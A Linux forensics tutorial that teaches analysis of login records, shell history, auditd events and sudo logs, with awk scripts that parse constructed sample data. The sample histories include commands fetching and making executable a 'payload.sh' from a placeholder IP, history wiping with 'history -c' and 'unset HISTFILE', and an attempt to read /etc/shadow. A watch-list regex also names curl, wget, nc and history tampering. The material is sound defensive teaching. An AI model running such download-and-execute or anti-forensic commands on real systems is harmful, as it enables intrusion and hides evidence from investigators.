User activity on Linux systems can provide valuable insights during forensic investigations. This project will guide you through the process of analyzing user activity, including login records, shell history, and user-specific files. You will learn how to use various tools and techniques to gather and interpret evidence of user actions.
The objective of this project is to provide hands-on experience in analyzing user activity on Linux systems. By the end of this project, you will be able to effectively use forensic tools to investigate user actions and gather relevant evidence.
To complete this project, you will need access to a Linux operating system. You can use a physical machine, set up a virtual machine using software like VirtualBox or VMware, or use a cloud-based Linux instance.
- Basic understanding of Linux OS and command-line interface
- Administrative privileges on the Linux machine
For this project, we will use the following tools:
- `last`: displays login history from the wtmp login database (/var/log/wtmp). Its companions `lastb` (failed logins, from /var/log/btmp) and `lastlog` (most recent login per account) are worth knowing too.
- `ausearch`: queries the audit log written by auditd (/var/log/audit/audit.log); `auditctl` manages the rules that decide what gets logged.
- `grep`: searches plain-text data.
- Logwatch: a log analysis and reporting tool.
- Install auditd and Logwatch using the package manager (Debian/Ubuntu shown; the auditd package provides auditctl and ausearch):
sudo apt-get install auditd logwatch
Objective: Learn how to analyze login records to understand user login activity.
Steps:
- Open a terminal.
- Use the `last` command to display the login history:
last
Add `-i` to show numeric source addresses instead of resolved hostnames and `-F` for full timestamps. `last` reads only the current /var/log/wtmp; rotated copies such as /var/log/wtmp.1 are read with `last -f`.
- Review the output to identify login times, session durations, source hosts and user accounts. Compare it with `lastb` (failed logins from /var/log/btmp, which normally requires root to read) and `lastlog` (each account's most recent login).
Expected Output: You should be able to see a history of user logins, including login times, durations, source hosts and the accounts used. Because wtmp is an ordinary file that anyone with root can truncate or edit, treat gaps or an unexpectedly recent "wtmp begins" line as findings in themselves, and corroborate logins against auth.log and the audit log.
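Reading `last` output by eye works for a handful of sessions; for a busy host you want it summarized. The script below is an added example, not part of the original page: it reduces plain `last` output to (user, source) counts and flags sessions that started on a weekend or outside an assumed 07:00-19:00 window. SAMPLE_LAST is constructed data, and the business-hours window is an assumption to adjust for the environment under investigation.

```sh
#!/bin/sh
# Added example (not from the original page): summarise plain `last` output.
# SAMPLE_LAST is constructed data; on a real system pipe `last -i` or
# `last -i -f /var/log/wtmp.1` into the functions instead.
SAMPLE_LAST='alice    pts/0        203.0.113.45     Mon Jan  8 09:12 - 09:40  (00:28)
bob      tty1                          Mon Jan  8 08:00 - 08:30  (00:30)
root     pts/1        10.0.0.7         Sun Jan  7 23:55 - 00:10  (00:15)
alice    pts/0        203.0.113.45     Sun Jan  7 14:02 - 14:20  (00:18)
reboot   system boot  5.15.0-91-generic Sun Jan  7 13:50   still running
mallory  pts/2        198.51.100.9     Sat Jan  6 03:14 - 03:16  (00:02)

wtmp begins Fri Jan  5 12:00:00 2024'

# Print "user source count", most frequent (user, source) pair first.
# Console logins have no host column, so the weekday appears in $3 rather than $4.
login_summary() {
    awk '
    /^$/ || /^wtmp/ || $1 == "reboot" { next }
    {
        host = ($3 ~ /^(Mon|Tue|Wed|Thu|Fri|Sat|Sun)$/) ? "local" : $3
        n[$1 " " host]++
    }
    END { for (k in n) print k, n[k] }' | sort -k3,3nr -k1,1
}

# Print sessions that began on a weekend or outside 07:00-19:00 (an assumed
# business-hours window; adjust it to the environment under investigation).
odd_hour_logins() {
    awk '
    /^$/ || /^wtmp/ || $1 == "reboot" { next }
    {
        off   = ($3 ~ /^(Mon|Tue|Wed|Thu|Fri|Sat|Sun)$/) ? 0 : 1
        host  = off ? $3 : "local"
        day   = $(3 + off); start = $(6 + off)
        hour  = substr(start, 1, 2) + 0
        if (day ~ /^(Sat|Sun)$/ || hour < 7 || hour >= 19)
            print $1, host, day, start
    }'
}

printf '%s\n' "$SAMPLE_LAST" | login_summary
printf '%s\n' "$SAMPLE_LAST" | odd_hour_logins
```

The summary puts alice's two sessions from 203.0.113.45 first; the odd-hour filter surfaces root's Sunday-night session and mallory's 03:14 login, which is the kind of entry to cross-check against sudo and audit logs.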
Objective: Analyze shell command history files to identify commands executed by users.
Steps:
- Open a terminal.
- Navigate to a user's home directory (check /etc/passwd for the actual home path; not every account lives under /home, and root's history is in /root):
cd /home/username
- Display the contents of the `.bash_history` file:
cat .bash_history
- Use `grep` to search for specific commands or keywords:
grep "sudo" .bash_history
- Check the other history files the account may have, depending on its shell and tools: .zsh_history (entries look like `: <epoch>:<elapsed>;<command>` when extended history is enabled), .sh_history, .mysql_history, .python_history, .viminfo and .lesshst.
Expected Output: You should be able to see the history of commands executed by the user and identify specific actions taken. Keep the file's limitations in mind: by default bash writes it only when the shell exits, so commands from sessions still open or killed never reach the disk; lines carry no timestamps unless HISTTIMEFORMAT was set (then each command is preceded by a `#<epoch>` line); and the user can edit the file, run `history -c`, or unset HISTFILE. An empty or truncated history for an active account is itself a finding worth correlating with login records and audit logs.
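Reading one user's file at a time does not scale, and bash and zsh store timestamps differently. The script below is an added example, not from the original page: it walks every home directory under a root (a mounted image in practice; here a constructed temporary tree), normalizes bash and zsh history into one `epoch<TAB>user<TAB>command` timeline, and filters it with a watch-list for privilege use, downloads and history tampering. The sample histories are constructed, the watch-list is deliberately broad, and deriving the user name from the directory name is a simplification (/etc/passwd is authoritative).

```sh
#!/bin/sh
# Added example (not from the original page): collect every user's shell history into
# one timeline and flag commands worth a closer look. The home directories below are
# constructed under a temporary root; point SAMPLE_ROOT at a mounted disk image instead.
SAMPLE_ROOT=$(mktemp -d)
trap 'rm -rf "$SAMPLE_ROOT"' EXIT
mkdir -p "$SAMPLE_ROOT/home/alice" "$SAMPLE_ROOT/home/bob" "$SAMPLE_ROOT/root"
# bash with HISTTIMEFORMAT set: a "#<epoch>" line precedes each command
printf '%s\n' '#1704700000' 'ls -la' '#1704700060' 'sudo apt-get install nmap' \
    '#1704700120' 'curl -O http://203.0.113.45/payload.sh' '#1704700180' 'chmod +x payload.sh' \
    > "$SAMPLE_ROOT/home/alice/.bash_history"
# zsh EXTENDED_HISTORY: ": <epoch>:<elapsed>;<command>"
printf '%s\n' ': 1704690000:0;cd /tmp' ': 1704690030:0;wget http://198.51.100.9/x.tar.gz' \
    ': 1704690100:0;history -c' > "$SAMPLE_ROOT/home/bob/.zsh_history"
# bash without timestamps: the file alone cannot say when these ran
printf '%s\n' 'vim /etc/ssh/sshd_config' 'unset HISTFILE' > "$SAMPLE_ROOT/root/.bash_history"

# normalize_history USER FILE -> "epoch<TAB>user<TAB>command" per line ("?" when untimed)
normalize_history() {
    awk -v user="$1" '
    BEGIN { ts = "?" }
    /^#[0-9]+$/ { ts = substr($0, 2); next }                 # bash timestamp line
    /^: [0-9]+:[0-9]+;/ {                                    # zsh extended history
        match($0, /^: [0-9]+/)
        print substr($0, 3, RLENGTH - 2) "\t" user "\t" substr($0, index($0, ";") + 1)
        next
    }
    NF { print ts "\t" user "\t" $0; ts = "?" }' "$2"
}

# scan_all_histories ROOT -> merged timeline of ROOT/home/* and ROOT/root, oldest first.
# The user name is taken from the directory name (an assumption; /etc/passwd is authoritative).
scan_all_histories() {
    for home in "$1"/home/* "$1"/root; do
        [ -d "$home" ] || continue
        user=$(basename "$home")
        for f in "$home/.bash_history" "$home/.zsh_history"; do
            [ -f "$f" ] && normalize_history "$user" "$f"
        done
    done | sort -t "$(printf '\t')" -k1,1n
}

# Keep commands that match a deliberately broad watch-list: privilege use, downloads,
# encoding tricks and anti-forensic history tampering.
flag_suspicious() {
    awk -F '\t' '$3 ~ /^(sudo|su|curl|wget|base64|nc|chmod \+x)( |$)|history -c|HISTFILE|\.ssh\//'
}

scan_all_histories "$SAMPLE_ROOT" | flag_suspicious
```

Untimed entries sort to the top with a `?` timestamp, which is a useful reminder that root's commands here cannot be placed on the timeline from the history file alone; the audit log or file modification times have to supply the when.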
Objective: Use Auditd to track and analyze user activity.
Steps:
- Ensure the `auditd` service is running:
sudo service auditd start
- Add an audit rule to track changes in the user's home directory:
sudo auditctl -w /home/username -p war -k user_activity
`-w` sets a watch on the path, `-p war` records write, attribute-change and read access, and `-k user_activity` tags every matching record with a key you can search for. Watching reads across a whole home directory is noisy; `-p wa` is usually enough for change tracking. Rules added with `auditctl` last only until reboot; put them in a file under /etc/audit/rules.d/ to make them persistent.
- Generate some user activity by creating, modifying, and deleting files in the home directory.
- Use `ausearch` to query the audit logs for user activity:
sudo ausearch -k user_activity
Add `-i` to translate numeric uids, syscall numbers and timestamps into readable form and `-ts today` to limit the time range; `sudo aureport -k` summarizes hits per key.
Expected Output: You should be able to track and analyze user activities such as file creation, modification, and deletion using Auditd. Each event is a group of records sharing one `msg=audit(<timestamp>:<serial>)` id: the SYSCALL record names the program (`exe=`), the effective `uid=` and the `auid=` (the login uid, which survives su and sudo and therefore identifies who actually logged in), and the PATH records name the files touched with `nametype=` values such as CREATE, DELETE or NORMAL.
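Raw audit records are verbose and split one event across several lines, which is why `ausearch -i` exists; understanding how they join is what lets you spot actions done through sudo. The script below is an added example, not from the original page: it reassembles constructed records of the shape the rule above produces into one line per file operation, then isolates events where the effective uid differs from the login uid. SAMPLE_AUDIT is constructed data; on a real host feed the functions `sudo ausearch -k user_activity --raw` or /var/log/audit/audit.log instead.

```sh
#!/bin/sh
# Added example (not from the original page): reassemble raw auditd records into one
# line per file operation. SAMPLE_AUDIT is constructed to resemble what a
# `-w /home/alice -p wa -k user_activity` watch writes; it is not real log data.
SAMPLE_AUDIT='type=SYSCALL msg=audit(1704700200.123:401): arch=c000003e syscall=257 success=yes exit=3 items=2 ppid=2000 pid=2010 auid=1001 uid=1001 gid=1001 euid=1001 suid=1001 fsuid=1001 tty=pts0 ses=4 comm="touch" exe="/usr/bin/touch" key="user_activity"
type=CWD msg=audit(1704700200.123:401): cwd="/home/alice"
type=PATH msg=audit(1704700200.123:401): item=0 name="/home/alice" inode=131 dev=fd:00 mode=040755 ouid=1001 ogid=1001 nametype=PARENT
type=PATH msg=audit(1704700200.123:401): item=1 name="/home/alice/notes.txt" inode=140 dev=fd:00 mode=0100644 ouid=1001 ogid=1001 nametype=CREATE
type=SYSCALL msg=audit(1704700260.456:402): arch=c000003e syscall=263 success=yes exit=0 items=2 ppid=2000 pid=2011 auid=1001 uid=0 gid=0 euid=0 suid=0 fsuid=0 tty=pts0 ses=4 comm="rm" exe="/usr/bin/rm" key="user_activity"
type=CWD msg=audit(1704700260.456:402): cwd="/home/alice"
type=PATH msg=audit(1704700260.456:402): item=0 name="/home/alice" inode=131 dev=fd:00 mode=040755 ouid=1001 ogid=1001 nametype=PARENT
type=PATH msg=audit(1704700260.456:402): item=1 name="/home/alice/notes.txt" inode=140 dev=fd:00 mode=0100644 ouid=1001 ogid=1001 nametype=DELETE'

# audit_file_events: join the SYSCALL and PATH records sharing an event id and print
# "<timestamp> auid=<login uid> uid=<effective uid> key=<rule key> <exe> <op> <path>".
audit_file_events() {
    awk '
    # val(k): value of the k=... field in the current record, quotes stripped.
    function val(key,   i, v) {
        for (i = 1; i <= NF; i++)
            if (index($i, key "=") == 1) { v = substr($i, length(key) + 2); gsub(/"/, "", v); return v }
        return ""
    }
    {
        ev = val("msg"); sub(/^audit\(/, "", ev); sub(/\):?$/, "", ev)   # now "ts:serial"
        split(ev, p, ":"); ts = p[1]; id = p[2]
    }
    $1 == "type=SYSCALL" {
        if (!(id in info)) order[++n] = id
        info[id] = ts " auid=" val("auid") " uid=" val("uid") " key=" val("key") " " val("exe")
    }
    $1 == "type=PATH" && val("nametype") != "PARENT" { path[id] = val("nametype") " " val("name") }
    END { for (i = 1; i <= n; i++) if (order[i] in path) print info[order[i]], path[order[i]] }'
}

# privilege_escalated: keep events whose effective uid differs from the login uid,
# i.e. work done through sudo or su that still traces back to the account that logged in.
privilege_escalated() {
    awk '{ split($2, a, "="); split($3, u, "="); if (a[2] != u[2]) print }'
}

printf '%s\n' "$SAMPLE_AUDIT" | audit_file_events
printf '%s\n' "$SAMPLE_AUDIT" | audit_file_events | privilege_escalated
```

The second event shows why `auid` matters: the file was deleted by uid 0, but the login uid is still 1001, so the deletion is attributed to alice acting as root rather than to an unknown root session.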
Objective: Use Logwatch to generate reports that include user-specific log entries.
Steps:
- Open a terminal.
- Run Logwatch to generate a report for today's logs at the highest detail level and print it to the terminal:
sudo logwatch --detail High --range Today --output stdout
- To have the report mailed instead, replace `--output stdout` with `--mailto <address>`. Narrow the report to the services that carry user activity with `--service sshd --service sudo` (repeat `--service` as needed), and widen the window with `--range Yesterday`, `--range All` or a relative range (`logwatch --range Help` documents the syntax).
- Review the generated report.
Expected Output: You should receive a detailed report generated by Logwatch that includes user-specific log entries, such as SSH logins and sudo commands.
Objective: Analyze sudo logs to identify actions performed with elevated privileges.
Steps:
- Open a terminal.
- Navigate to the /var/log directory:
cd /var/log
- Display the contents of the `auth.log` file and filter for sudo activity:
sudo grep "sudo" auth.log
On Red Hat-family systems the same entries are in /var/log/secure, and on systemd hosts `sudo journalctl _COMM=sudo` queries the journal directly. Include rotated files with `sudo zgrep sudo auth.log*` so the search covers more than the current day.
- Review the output to identify commands executed with sudo and the associated user accounts. A successful invocation is logged as `<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<argv>`, bracketed by pam_unix "session opened" and "session closed" lines; failures appear as `<n> incorrect password attempts` or `user NOT in sudoers`, still carrying the command that was attempted.
Expected Output: You should be able to see a log of commands executed with sudo and identify the users who performed these actions. Note that the log records only the command sudo launched: after `sudo -i` or `sudo bash`, everything typed in the resulting root shell is invisible here and has to be reconstructed from root's shell history, the audit log, or sudo's own I/O logging if `log_output` is enabled in sudoers.
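`grep sudo` returns every line with the word in it, including pam_unix session noise, and leaves you to pick the fields apart by hand. The script below is an added example, not from the original page: it splits auth.log-style sudo lines into successful invocations (who, target user, command) and failures (who, why, what they tried). SAMPLE_AUTH is constructed data; on a real host feed the functions `sudo zgrep sudo /var/log/auth.log*` or `sudo journalctl _COMM=sudo -o short` instead.

```sh
#!/bin/sh
# Added example (not from the original page): parse sudo entries out of auth.log-style
# lines. SAMPLE_AUTH is constructed and not taken from a real system.
SAMPLE_AUTH='Jan  8 09:15:02 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get install nmap
Jan  8 09:15:02 host sudo: pam_unix(sudo:session): session opened for user root(uid=0) by alice(uid=1001)
Jan  8 09:15:09 host sudo: pam_unix(sudo:session): session closed for user root
Jan  8 09:20:41 host sudo:  mallory : 3 incorrect password attempts ; TTY=pts/2 ; PWD=/home/mallory ; USER=root ; COMMAND=/bin/bash
Jan  8 09:22:10 host sudo:  mallory : user NOT in sudoers ; TTY=pts/2 ; PWD=/home/mallory ; USER=root ; COMMAND=/bin/cat /etc/shadow
Jan  8 09:30:00 host sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/vim /etc/sudoers'

# sudo_commands: successful invocations as "timestamp<TAB>user<TAB>target<TAB>command".
# Only lines of the form "<user> : TTY=..." match, so pam_unix session lines are skipped.
sudo_commands() {
    awk '
    /sudo: +[^ ]+ : TTY=/ {
        ts = $1 " " $2 " " $3
        sub(/^.*sudo: +/, "")                 # drop the syslog prefix; fields re-split
        user = $1
        n = split($0, f, " ; ")               # "user : TTY=...", "PWD=...", "USER=...", "COMMAND=..."
        target = ""; cmd = ""
        for (i = 1; i <= n; i++) {
            if (f[i] ~ /^USER=/)    target = substr(f[i], 6)
            if (f[i] ~ /^COMMAND=/) cmd    = substr(f[i], 9)
        }
        print ts "\t" user "\t" target "\t" cmd
    }'
}

# sudo_failures: refused attempts as "timestamp<TAB>user<TAB>reason<TAB>command".
sudo_failures() {
    awk '
    /sudo: +[^ ]+ : .*(incorrect password attempts|NOT in sudoers)/ {
        ts = $1 " " $2 " " $3
        sub(/^.*sudo: +/, "")
        user = $1
        reason = $0; sub(/^[^:]+ : /, "", reason); sub(/ ; .*$/, "", reason)
        cmd = $0; sub(/^.*COMMAND=/, "", cmd)
        print ts "\t" user "\t" reason "\t" cmd
    }'
}

printf '%s\n' "$SAMPLE_AUTH" | sudo_commands
printf '%s\n' "$SAMPLE_AUTH" | sudo_failures
```

The failure lines are often the more interesting half: an account that is not in sudoers repeatedly trying to read /etc/shadow is worth correlating with that user's login source from `last` and with their shell history.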
With these exercises, you gain practical experience in forensic analysis of user activity on Linux systems: reading login records, shell history, audit events and sudo logs, and cross-checking them against one another, since any one of these sources can be incomplete or tampered with on its own.